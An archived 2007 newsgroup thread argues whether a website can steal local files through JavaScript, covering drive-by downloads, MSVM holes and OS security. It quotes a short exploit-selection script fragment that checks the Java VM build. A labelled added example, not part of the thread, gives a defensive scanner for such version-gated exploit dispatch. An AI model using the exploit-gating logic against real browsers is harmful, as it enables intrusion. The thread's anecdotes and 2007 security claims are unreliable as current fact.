>> You know this for a fact? Can you name such a site?
>> Or did this happen to a friend of a friend?
>
> it happened to me on windoze which is why i scrapped windoze for mac
> os x and linux.
>
> you guys are seriously trying to tell me you have never heard of
> these kind of attacks ?
>
> i suggest you visit some security websites to see how prevalent they
> are and how easy they seem to be to execute.

The only way that can happen is in scenario 3.) above when using IE.
And then only when someone has manually turned off the default security
settings in IE first.

I suggest you post a link to this "Magic" malicious site...

--
Dag.

May 25 '07 #26
On May 25, 1:57 pm, "Dag Sunde" <m...@dagsunde.com> wrote:
> navti wrote:
>> On May 25, 10:53 am, Lee <REM0VElbspamt...@cox.net> wrote:
>>> navti said:
>>>>> The only way a webserver can compromise a client in the way you
>>>>> described is either:
>>>>> 1.) A signed Java Applet where you explicitly have answered
>>>>>     "Yes" when asked if you wanted to let the applet run.
>>>>> 2.) A signed ActiveX control where you explicitly have
>>>>>     answered "Yes" when asked if you wanted to let the control run.
>>>>> 3.) Any ActiveX control, and you have the security settings of
>>>>>     your browser wide-open.
>>>>> Neither PHP nor JavaScript is able to access your files.
>>>> what about drive by downloads where the client simply has to visit a
>>>> malicious web site to be compromised ? you know that the client
>>>> doesnt have to do anything to give up his data to a malicious
>>>> website so why are you denying it ?
>>> You know this for a fact? Can you name such a site?
>>> Or did this happen to a friend of a friend?
>> it happened to me on windoze which is why i scrapped windoze for mac
>> os x and linux.
>> you guys are seriously trying to tell me you have never heard of
>> these kind of attacks ?
>> i suggest you visit some security websites to see how prevalent they
>> are and how easy they seem to be to execute.
>
> The only way that can happen is in scenario 3.) above when using IE.
> And then only when someone has manually turned off the default security
> settings in IE first.
>
> I suggest you post a link to this "Magic" malicious site...
>
> --
> Dag.

there are thousands of sites which can harm your computer.

most are porn etc

tell me you are pulling my leg ?

you have never heard of webattacker, xss etc etc
May 25 '07 #27

"Dag Sunde" <me@dagsunde.com> wrote in message
news:46**********************@news.wineasy.se...
> navti wrote:
>>> The only way a webserver can compromise a client in the way you
>>> described is either:
>>> 1.) A signed Java Applet where you explicitly have answered
>>> "Yes" when asked if you wanted to let the applet run.
>>> 2.) A signed ActiveX control where you explicitly have answered
>>> "Yes" when asked if you wanted to let the control run.
>>> 3.) Any ActiveX control, and you have the security settings of
>>> your browser wide-open.
>>>
>>> Neither PHP nor JavaScript is able to access your files.
>> what about drive by downloads where the client simply has to visit a
>> malicious web site to be compromised ? you know that the client doesn't
>> have to do anything to give up his data to a malicious website so why
>> are you denying it ?
>
> Prove it!
>
> Prove it by posting a link to such a site, and I'll go there myself
> with all my different browsers to see if you are right!

Aren't you starting to get an image of a short squat fellow domiciled beneath
an over water conveyance structure...

> --
> Dag.


May 25 '07 #28
navti wrote:
> On May 25, 1:57 pm, "Dag Sunde" <m...@dagsunde.com> wrote:
>> navti wrote:
>>> On May 25, 10:53 am, Lee <REM0VElbspamt...@cox.net> wrote:
>>>> navti said:
>>>>>> The only way a webserver can compromise a client in the way you
>>>>>> described is either:
>>>>>> 1.) A signed Java Applet where you explicitly have answered
>>>>>> "Yes" when asked if you wanted to let the applet run.
>>>>>> 2.) A signed ActiveX control where you explicitly have
>>>>>> answered "Yes" when asked if you wanted to let the control run.
>>>>>> 3.) Any ActiveX control, and you have the security settings
>>>>>> of your browser wide-open.
>>>>>> Neither PHP nor JavaScript is able to access your files.
>>>>> what about drive by downloads where the client simply has to
>>>>> visit a malicious web site to be compromised ? you know that the
>>>>> client doesn't have to do anything to give up his data to a
>>>>> malicious website so why are you denying it ?
>>>> You know this for a fact? Can you name such a site?
>>>> Or did this happen to a friend of a friend?
>>>> --
>>> it happened to me on windoze which is why i scrapped windoze for mac
>>> os x and linux.
>>> you guys are seriously trying to tell me you have never heard of
>>> these kind of attacks ?
>>> i suggest you visit some security websites to see how prevalent they
>>> are and how easy they seem to be to execute.
>>
>> The only way that can happen is in scenario 3.) above when using IE.
>> And then only when someone has manually turned off the default
>> security settings in IE first.
>>
>> I suggest you post a link to this "Magic" malicious site...
>>
>> --
>> Dag.
>
> there are thousands of sites which can harm your computer.
>
> most are porn etc

I promise not to blush... Post a harmful link!

> tell me you are pulling my leg ?

No, definitely not!

> you have never heard of webattacker, xss etc etc

Of course I have, but those are only harmful to those that have opened
up the default security settings of their browsers... javaScript alone
can't do any harm to my computer. And neither can Applets or ActiveX
controls without me giving them explicit permission to do so.

This thread started with you claiming that an "enemy's" web-site
managed to access your computer

<quote>
> i visited a website of an enemy and he not only did a listing of my
> local files he also copied them to his server. i'm pretty certain he
> was using javascript.
</quote>

Post a link to this site. It is in everybody's interest that you do so.

--
Dag.
May 25 '07 #29
On 25 May, 16:53, "Dag Sunde" <m...@dagsunde.com> wrote:
> navti wrote:
>> On May 25, 1:57 pm, "Dag Sunde" <m...@dagsunde.com> wrote:
>>> navti wrote:
>>>> On May 25, 10:53 am, Lee <REM0VElbspamt...@cox.net> wrote:
>>>>> navti said:
>>>>>>> The only way a webserver can compromise a client in the way you
>>>>>>> described is either:
>>>>>>> 1.) A signed Java Applet where you explicitly have answered
>>>>>>> "Yes" when asked if you wanted to let the applet run.
>>>>>>> 2.) A signed ActiveX control where you explicitly have
>>>>>>> answered "Yes" when asked if you wanted to let the control run.
>>>>>>> 3.) Any ActiveX control, and you have the security settings
>>>>>>> of your browser wide-open.
>>>>>>> Neither PHP nor JavaScript is able to access your files.
>>>>>> what about drive by downloads where the client simply has to
>>>>>> visit a malicious web site to be compromised ? you know that the
>>>>>> client doesn't have to do anything to give up his data to a
>>>>>> malicious website so why are you denying it ?
>>>>> You know this for a fact? Can you name such a site?
>>>>> Or did this happen to a friend of a friend?
>>>>> --
>>>> it happened to me on windoze which is why i scrapped windoze for mac
>>>> os x and linux.
>>>> you guys are seriously trying to tell me you have never heard of
>>>> these kind of attacks ?
>>>> i suggest you visit some security websites to see how prevalent they
>>>> are and how easy they seem to be to execute.
>>> The only way that can happen is in scenario 3.) above when using IE.
>>> And then only when someone has manually turned off the default
>>> security settings in IE first.
>>> I suggest you post a link to this "Magic" malicious site...
>>> --
>>> Dag.
>> there are thousands of sites which can harm your computer.
>> most are porn etc
>
> I promise not to blush... Post a harmful link!
>
>> tell me you are pulling my leg ?
>
> No, definitely not!
>
>> you have never heard of webattacker, xss etc etc
>
> Of course I have, but those are only harmful to those that have opened
> up the default security settings of their browsers... javaScript alone
> can't do any harm to my computer. And neither can Applets or ActiveX
> controls without me giving them explicit permission to do so.
>
> This thread started with you claiming that an "enemy's" web-site
> managed to access your computer
>
> <quote>
>> i visited a website of an enemy and he not only did a listing of my
>> local files he also copied them to his server. i'm pretty certain he
>> was using javascript.
> </quote>
>
> Post a link to this site. It is in everybody's interest that you do so.
>
> --
> Dag.

Dag

this happened a while ago and the site is long gone,

you must know that these sites only stay online for a few days before
they are pulled down,

i am interested to know how he got hold of my files.

he pointed me to some of his websites and i went and had a look, i
clicked a few links and hey presto my hard drive starts churning,

by the time i realised what had happened he had nicked my files. i
know this because he got my telephone number and email and home
address from my resume which was on my desktop . i certainly never
sent it to him.

this has happened to me since and i have wiped windows off my
remaining PC and installed linux.

i got rid of my ibm thinkpad and got myself a powerbook.

i am now rid of the virus called windows.

We both know this happens all the time on windows so why are you
denying it ?

May 25 '07 #30
MikeB wrote:
> "Dag Sunde" <me@dagsunde.com> wrote in message
> news:46**********************@news.wineasy.se...
>> navti wrote:
>>> what about drive by downloads where the client simply has to visit a
>>> malicious web site to be compromised ? you know that the client doesn't
>>> have to do anything to give up his data to a malicious website so why
>>> are you denying it ?
>> Prove it!
>>
>> Prove it by posting a link to such a site, and I'll go there myself
>> with all my different browsers to see if you are right!
>
> Aren't you starting to get an image of a short squat fellow domiciled beneath
> an over water conveyance structure...

I know, I know!

A troll!

What do I win!?

--
-Lost
Remove the extra words to reply by e-mail. Don't e-mail me. I am
kidding. No I am not.
May 25 '07 #31
On May 25, 12:34 pm, -Lost <maventheextrawo...@techie.com> wrote:
> MikeB wrote:
>> "Dag Sunde" <m...@dagsunde.com> wrote in message
>> news:46**********************@news.wineasy.se...
>>> navti wrote:
>>>> what about drive by downloads where the client simply has to visit a
>>>> malicious web site to be compromised ? you know that the client doesn't
>>>> have to do anything to give up his data to a malicious website so why
>>>> are you denying it ?
>>> Prove it!
>>> Prove it by posting a link to such a site, and I'll go there myself
>>> with all my different browsers to see if you are right!
>> Aren't you starting to get an image of a short squat fellow domiciled beneath
>> an over water conveyance structure...
>
> I know, I know!
>
> A troll!
>
> What do I win!?

grow up will you.

i want to know how it was done.

i guess i will have to buy webattacker to find out.

May 25 '07 #32
navti wrote:
> On May 25, 12:34 pm, -Lost <maventheextrawo...@techie.com> wrote:
>> MikeB wrote:
>>> "Dag Sunde" <m...@dagsunde.com> wrote in message
>>> news:46**********************@news.wineasy.se...
>>>> navti wrote:
>>>>> what about drive by downloads where the client simply has to visit a
>>>>> malicious web site to be compromised ? you know that the client doesn't
>>>>> have to do anything to give up his data to a malicious website so why
>>>>> are you denying it ?
>>>> Prove it!
>>>> Prove it by posting a link to such a site, and I'll go there myself
>>>> with all my different browsers to see if you are right!
>>> Aren't you starting to get an image of a short squat fellow domiciled beneath
>>> an over water conveyance structure...
>> I know, I know!
>>
>> A troll!
>>
>> What do I win!?
>
> grow up will you.
>
> i want to know how it was done.
>
> i guess i will have to buy webattacker to find out.

Don't even start with me. It just so happens I trashed a response to
you, basically stating this thread and your responses in it were crap.

And funny, one of the things in it was, "And if you're just fishing for
exploit code, you'd have much better luck Googling."

And for the record... no one is denying what you are saying. What people
are denying is that you were running as secure as humanly possible
installation of Windows. It is evident by your browser hijacking
session that you were not operating under a secure premise. That says
something about you, not about anyone else in this thread.

You'll forgive us if we think you are a troll. 8-|

--
-Lost
Remove the extra words to reply by e-mail. Don't e-mail me. I am
kidding. No I am not.
May 25 '07 #33
On 25 May, 17:54, -Lost <maventheextrawo...@techie.com> wrote:
> navti wrote:
>> On May 25, 12:34 pm, -Lost <maventheextrawo...@techie.com> wrote:
>>> MikeB wrote:
>>>> "Dag Sunde" <m...@dagsunde.com> wrote in message
>>>> news:46**********************@news.wineasy.se...
>>>>> navti wrote:
>>>>>> what about drive by downloads where the client simply has to visit a
>>>>>> malicious web site to be compromised ? you know that the client doesn't
>>>>>> have to do anything to give up his data to a malicious website so why
>>>>>> are you denying it ?
>>>>> Prove it!
>>>>> Prove it by posting a link to such a site, and I'll go there myself
>>>>> with all my different browsers to see if you are right!
>>>> Aren't you starting to get an image of a short squat fellow domiciled beneath
>>>> an over water conveyance structure...
>>> I know, I know!
>>> A troll!
>>> What do I win!?
>> grow up will you.
>> i want to know how it was done.
>> i guess i will have to buy webattacker to find out.
>
> Don't even start with me.

start what ?

May 25 '07 #34
navti wrote:
> On 25 May, 17:54, -Lost <maventheextrawo...@techie.com> wrote:
>> navti wrote:
>>> On May 25, 12:34 pm, -Lost <maventheextrawo...@techie.com> wrote:
>>>> MikeB wrote:
>>>>> "Dag Sunde" <m...@dagsunde.com> wrote in message
>>>>> news:46**********************@news.wineasy.se...
>>>>>> navti wrote:
>>>>>>> what about drive by downloads where the client simply has to
>>>>>>> visit a malicious web site to be compromised ? you know that
>>>>>>> the client doesn't have to do anything to give up his data to a
>>>>>>> malicious website so why are you denying it ?
>>>>>> Prove it!
>>>>>> Prove it by posting a link to such a site, and I'll go there
>>>>>> myself with all my different browsers to see if you are right!
>>>>> Aren't you starting to get an image of a short squat fellow
>>>>> domiciled beneath an over water conveyance structure...
>>>> I know, I know!
>>>> A troll!
>>>> What do I win!?
>>> grow up will you.
>>> i want to know how it was done.
>>> i guess i will have to buy webattacker to find out.
>>
>> Don't even start with me.
>
> start what ?

Trolling...

You won't hear more from me either.

--
Dag.
May 25 '07 #35
navti wrote:
> On May 25, 5:13 am, Andrew Thompson <andrewtho...@gmail.com> wrote:
>> On May 25, 7:39 am, navti <nav...@gmail.com> wrote:
>>> On May 24, 10:16 pm, -Lost <maventheextrawo...@techie.com> wrote:
>>>> navti wrote:
>>> it all happened automatically without any intervention. i was using
>>> win2k and ie6 at the time. i have since switched to mac os x.
>>> ...
>>> if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
>>> { ExploitNumber=1; }
>>> else // if JVM = 5.0.3810.0 or higher
>> The (dreaded) MSVM.
>>
>> If this script found a 3809 or previous build MSVM, it
>> might have taken advantage (using a Java applet) of any
>> number of security holes in those Microsoft VM's. [snip]
>
> he stole my files . i know this for a fact.
> why would you think it was otherwise ? have you been living down a
> mineshaft for the past 5 years ? never heard of xss ? are you in some
> sort of state of denial ?
> only an ignoramus would try and deny it was possible for a webserver
> to compromise a client's machine.
>
> my mistake is thinking javascript was enough . obviously it was a
> combination of javascript, java, activex , php , xml etc etc

It looks to me - and I could be wrong - that it pushes a buffer overflow
to the browser to start existing code. I'd have to pull it to bits to be
sure what it's doing, but it seems it is using Javascript to build a page
existing code can read so that it knows what exploit to run.

If that's right - and as I say, it may not be - then it means that you
would have earlier agreed to let that code onto your machine either
explicitly or by having very low security settings on your browser. Low
enough that it can pretty much only be IE. It then exploits existing
software on your machine, such as Norton, McAfee and the old MS JVM
apparently.

Though I agree with the others so far, unlike them, I do think that once
it has got that far, it is quite possible to steal your files. I'd need
to see the code it on your system, but this kind of apparent "drive by"
as you call it is not really what you think. It's a double-attack; you
get apparently "safe" code on your system, later on you start it from a
site that doesn't carry any invasive code - in this case, a bit of
Javascript.

At that point, the code sitting quietly on your machine leaps into
action, does its thing and shuts up. It's a trojan, pure and simple. The
Javascript just exploits IE to start the trojan and it is the trojan,
not the Javascript, that does the damage. With luck, the person that
gets hit is daft enough to think it's that one website that causes the
problem, so doesn't realise the *real* problem is still sat on his
computer - the trojan.
May 25 '07 #36
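
Added example (not part of the thread and not code from any participant): a small static check a defender could run over script captured from a suspect page, flagging the pattern visible in the quoted `JVM_vers` fragment, where a component build number is compared against a threshold and the guarded statement sets a numeric selector. The function name, the regular expressions and the benign lines of the sample are assumptions constructed for this illustration, and the identifier list is a heuristic that will also match names such as `reverse`.

```javascript
// Added example: heuristic scan for version-gated dispatch in page script.
// findVersionGates and SAMPLE are hypothetical names for this illustration.

// Identifier fragments that suggest a component version is being inspected.
const VERSION_NAME = /(vers|build|plugin|jvm)/i;
// <identifier>[<index>] <relational op> <number>, e.g. JVM_vers[2]<3810
const COMPARE = /([A-Za-z_$][\w$]*)(?:\[\d+\])?\s*(<=|>=|<|>)\s*(\d+)/g;
// <identifier> = <number>;  i.e. a numeric selector being set
const ASSIGN = /([A-Za-z_$][\w$]*)\s*=\s*(\d+)\s*;/;

function findVersionGates(source) {
  const findings = [];
  const ifRe = /\bif\s*\(/g;
  let m;
  while ((m = ifRe.exec(source)) !== null) {
    // Walk balanced parentheses to isolate the whole condition.
    let depth = 1;
    let i = ifRe.lastIndex;
    while (i < source.length && depth > 0) {
      const ch = source[i++];
      if (ch === '(') depth++;
      else if (ch === ')') depth--;
    }
    if (depth !== 0) break; // unbalanced input: nothing more to parse
    const cond = source.slice(ifRe.lastIndex, i - 1);
    // Guarded statement, approximated as the text up to the next closing brace.
    const end = source.indexOf('}', i);
    const body = source.slice(i, end === -1 ? source.length : end);
    const assign = ASSIGN.exec(body);
    if (!assign) continue;
    COMPARE.lastIndex = 0;
    let cmp;
    while ((cmp = COMPARE.exec(cond)) !== null) {
      if (!VERSION_NAME.test(cmp[1])) continue; // not a version-like name
      findings.push({
        line: source.slice(0, m.index).split('\n').length,
        variable: cmp[1],
        op: cmp[2],
        threshold: Number(cmp[3]),
        selector: assign[1],
        value: Number(assign[2]),
      });
    }
  }
  return findings;
}

// Constructed sample: benign lines around the fragment quoted in the thread.
const SAMPLE = [
  'var width = screen.width;',
  'if (width < 1024) { layout = 2; }',
  'if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))',
  '{ ExploitNumber=1; }',
  'else // if JVM = 5.0.3810.0 or higher',
  '{ document.title = "hello"; }',
].join('\n');

for (const f of findVersionGates(SAMPLE)) {
  console.log(`line ${f.line}: ${f.variable} ${f.op} ${f.threshold} ` +
              `sets ${f.selector}=${f.value}`);
}
```

A hit is only a reason to look closer at the page and at what is already installed on the client; ordinary feature detection also branches on version numbers.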
On May 25, 5:02 pm, navti <nav...@gmail.com> wrote:
> On May 25, 5:13 am, Andrew Thompson <andrewtho...@gmail.com> wrote:
>> On May 25, 7:39 am, navti <nav...@gmail.com> wrote:
>>> On May 24, 10:16 pm, -Lost <maventheextrawo...@techie.com> wrote:
>>>> navti wrote:
>>> it all happened automatically without any intervention. i was using
>>> win2k and ie6 at the time.
>> ....
>> If this script found a 3809 or previous build MSVM, it
>> might have taken advantage (using a Java applet) of any
>> number of security holes in those Microsoft VM's. Even
>> the 3810 build has existing security issues that will
>> never be fixed.
> ....
> he stole my files . i know this for a fact.
> why would you think it was otherwise ?

Who? I specifically stated (requoting)

> If this script found a 3809 or previous build MSVM, it
> might have taken advantage (using a Java applet) of any
> number of security holes in those Microsoft VM's. ...

> ...have you been living down a
> mineshaft for the past 5 years ? never heard of xss ? are you in some
> sort of state of denial ?

See above 'it is possible'.

> only an ignoramus would try and deny it was possible for a webserver
> to compromise a client's machine.

Only an ignoramus would quote and comment on replies
they had apparently not read, or not understood. Try
not being an ignoramus, next time.

Andrew T.

May 26 '07 #37
navti wrote:
> On May 25, 11:20 am, "rf" <r...@invalid.com> wrote:
>> If your system is so insecure that this can happen then you should unplug
>> your system from the internet. It's unsafe.
>
> i did, it was called windows and i replaced it with a secure system
> called os x,

OS X is not inherently any more secure than Win XP. It is simply that
hackers spend far more of their time trying to break into Windows than
other platforms.
May 29 '07 #38
On Tue, 29 May 2007 09:56:14 -0400, Christopher Barber wrote:
> navti wrote:
>> On May 25, 11:20 am, "rf" <r...@invalid.com> wrote:
>>> If your system is so insecure that this can happen then you should
>>> unplug your system from the internet. It's unsafe.
>>
>> i did, it was called windows and i replaced it with a secure system
>> called os x,
>
> OS X is not inherently any more secure than Win XP. It is simply that
> hackers spend far more of their time trying to break into Windows than
> other platforms.

...and if people keep saying that enough it will some day become true?

People spend more time writing malicious code for Windows than any other
OS because any idiot can write a debilitating virus or worm for Windows.
So much so that a few of the most destructive worms written for Windows
were accidentally as destructive as they turned out to be. (see: iloveyou
virus... which wasn't a virus.)

The current security hole in Open Office is the closest thing there's ever
been to an ease of use windows exploit. But I have no doubt that hole will
be closed before there's ever an exploit in the wild.
May 29 '07 #39
Ivan Marsh wrote:
> On Tue, 29 May 2007 09:56:14 -0400, Christopher Barber wrote:
>> navti wrote:
>>> On May 25, 11:20 am, "rf" <r...@invalid.com> wrote:
>>>> If your system is so insecure that this can happen then you should
>>>> unplug your system from the internet. It's unsafe.
>>> i did, it was called windows and i replaced it with a secure system
>>> called os x,
>> OS X is not inherently any more secure than Win XP. It is simply that
>> hackers spend far more of their time trying to break into Windows than
>> other platforms.
>
> ...and if people keep saying that enough it will some day become true?
>
> People spend more time writing malicious code for Windows than any other
> OS because any idiot can write a debilitating virus or worm for Windows.
> So much so that a few of the most destructive worms written for Windows
> were accidentally as destructive as they turned out to be. (see: iloveyou
> virus... which wasn't a virus.)
>
> The current security hole in Open Office is the closest thing there's ever
> been to an ease of use windows exploit. But I have no doubt that hole will
> be closed before there's ever an exploit in the wild.

Which version and where is it already listed as an exploit?

--
-Lost
Remove the extra words to reply by e-mail. Don't e-mail me. I am
kidding. No I am not.
May 30 '07 #40
On Wed, 30 May 2007 01:02:15 -0400, -Lost wrote:
> Ivan Marsh wrote:
>> On Tue, 29 May 2007 09:56:14 -0400, Christopher Barber wrote:
>>> navti wrote:
>>>> On May 25, 11:20 am, "rf" <r...@invalid.com> wrote:
>>>>> If your system is so insecure that this can happen then you should
>>>>> unplug your system from the internet. It's unsafe.
>>>> i did, it was called windows and i replaced it with a secure system
>>>> called os x,
>>> OS X is not inherently any more secure than Win XP. It is simply that
>>> hackers spend far more of their time trying to break into Windows than
>>> other platforms.
>>
>> ...and if people keep saying that enough it will some day become true?
>>
>> People spend more time writing malicious code for Windows than any
>> other OS because any idiot can write a debilitating virus or worm for
>> Windows. So much so that a few of the most destructive worms written
>> for Windows were accidentally as destructive as they turned out to be.
>> (see: iloveyou virus... which wasn't a virus.)
>>
>> The current security hole in Open Office is the closest thing there's
>> ever been to an ease of use windows exploit. But I have no doubt that
>> hole will be closed before there's ever an exploit in the wild.
>
> Which version and where is it already listed as an exploit?

I said "closest thing" to an exploit... it's only a proof of concept.

http://apcmag.com/6162/first_openoffice_virus_emerges
May 31 '07 #41
